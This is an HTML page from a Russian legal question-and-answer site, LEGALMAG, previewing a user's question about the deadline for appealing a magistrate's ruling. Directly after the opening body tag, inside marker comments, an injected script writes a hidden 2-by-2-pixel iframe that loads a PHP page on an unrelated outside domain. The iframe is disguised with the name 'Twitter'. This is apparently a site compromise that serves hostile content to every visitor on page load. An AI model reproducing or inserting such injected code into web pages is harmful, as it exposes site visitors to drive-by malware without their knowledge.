<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>LEGALMAG</title>

	<link rel="stylesheet" href="design/css/style.css">
	<!--[if IE 7]><link rel="stylesheet" href="design/css/style_ie7.css" /><![endif]-->
	<!--[if IE 8]><link rel="stylesheet" href="design/css/style_ie8.css" /><![endif]-->
	<!--[if IE 9]><link rel="stylesheet" href="design/css/style_ie9.css" /><![endif]-->
	<link rel="stylesheet" href="design/css/jquery-ui-1.8.20.custom.css">
	<link rel="stylesheet" href="design/css/jquery.ui.selectmenu.css">
	<link rel="stylesheet" href="design/css/jquery.fancybox.css">

	<script src="design/js/jquery-1.7.2.min.js"></script>
	<!--[if lt IE 9]><script src="design/js/html5.js"></script><![endif]-->
	<script src="design/js/custom.js"></script>
</head>

<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->


	<section id="body">
		<header><!--header-->
			<div class="wrapper">
				<a id="logo" href="index.html" title="LEGALMAG"></a>
				<div id="logged">
					Привет,&nbsp;<a class="enter" href="">Валентин!</a>
					<a class="register" href="">Выйти</a>
					<div class="sep"></div>
				</div>
				<nav class="auth"><!--top-navigation-->
					<ul>
						<li class="active"><a href="">Лента вопросов</a></li>
						<li><a href="">Каталог</a></li>
						<li><a href="">Личный кабинет</a></li>
						<li ><a href="">Вопросы и ответы</a></li>
						<li><a href="">Как это работает?</a></li>
					</ul>
				</nav><!--/top-navigation-->
			</div>
		</header><!--/header-->

		<div class="clear">&nbsp;</div>

		<section id="content"><!--content-->
			<div class="wrapper">
				<aside id="left-col">
					<div id="user">
						<img src="design/img/noAvatar.png" alt="">
						<p class="name">Валентин Кислый</p>
						<a class="editProfile" href="">редактировать профиль</a>
						<p class="myMessages"><a href="">Мои сообщения</a> (<span>3</span>)</p>
					</div>
					<div id="leftHelp">
						<p>Проверьте вашу публикацию.</p>
						<p class="strong">Так она будет отображена на сайте.</p>
					</div>
					<div id="offers">
						<h2>Предлагаю услуги:</h2>
						<dl>
							<dt><img src="design/images/offers.jpg" alt=""></dt>
							<dd class="name">Иванов Иван Сергеевич</dd>
							<dd class="spec">Специалист по гражданскому и семейному праву</dd>
							<dd><input type="submit" class="button-fox" value="Написать"></dd>
							<dd class="clear none">&nbsp;</dd>
						</dl>
						<dl>
							<dt><img src="design/images/offers.jpg" alt=""></dt>
							<dd class="name">Иванов Иван Сергеевич</dd>
							<dd class="spec">Специалист по гражданскому и семейному праву</dd>
							<dd><input type="submit" class="button-fox" value="Написать"></dd>
							<dd class="clear none">&nbsp;</dd>
						</dl>
						<dl>
							<dt><img src="design/images/offers.jpg" alt=""></dt>
							<dd class="name">Иванов Иван Сергеевич</dd>
							<dd class="spec">Специалист по гражданскому и семейному праву</dd>
							<dd><input type="submit" class="button-fox" value="Написать"></dd>
							<dd class="clear none">&nbsp;</dd>
						</dl>
					</div>
				</aside>
				<section id="right-col">
					<p class="headTitle">Так будет выглядеть ваше сообщение</p>
					<div class="question">
						<table>
							<tr>
								<td rowspan="2" class="first">
									<p  class="qSubscribe"></p>
									<span>3</span>
									<a href="">Подписаться</a>
								</td>
								<td class="title"><a href="">Срок подачи аппеляционной жалобы на решение мирового судьи</a></td>
							</tr>
							<tr>
								<td class="text">Предположим, что решение вынесено и получено на руки 30/12 (последний рабочий день перед новогодними праздниками), а затем первый рабочий день...</td>
							</tr>
							<tr>
								<td rowspan="2" class="price"><p>190</p></td>
								<td class="place">Месторасположение: <strong>Краснодар</strong></td>
							</tr>
							<tr>
								<td class="tags">Теги: <a href="">процесс,</a> <a href="">аппеляция</a></td>
							</tr>
						</table>
						<div class="summary">
							<p class="time">15 часов 19 минут назад</p>
							<p class="views">5 просмотров</p>
							<p class="answers"> 0 ответов</p>
							<p class="author">Автор: <a href="">Александра</a></p>
							<p class="privatMessage"><a href="">личное сообщение</a></p>
						</div>
						<div class="clear ">&nbsp;</div>
					</div>
					<div class="buttonHolder2">
						<input type="submit" class="buttonEdit" value="Редактировать">
						<input type="submit" class="buttonPublish" value="Опубликовать">
					</div>
				</section>
			</div>
		</section><!--/content-->

	<div class="clear">&nbsp;</div>
	<div id="rasporka"></div>

	</section><!--/body-wrapper-->

	<footer><!--footer-->
		<section class="wrapper">
			<div class="left-col">
				<p>&copy; Legalmag, 2012</p>
				<p>Все права защищены.</p>
				<p style="margin: 20px 0 5px 0;"><a href="">Условия использования</a></p>
				<a href="">Регламент техподдержки</a>
			</div>
			<div class="right-col">
				<nav>
					<ul>
						<li><a href="">О проекте </a></li>
						<li><a href="">Условия использования</a></li>
						<li class="active"><a href="">Для инвесторов</a></li>
						<li><a href="">Безопасность </a></li>
						<li><a href="">Контакты</a></li>
					</ul>
				</nav>
				<div id="paySystems"></div>
			</div>
		</section>
	</footer><!--/footer-->

</body>
</html>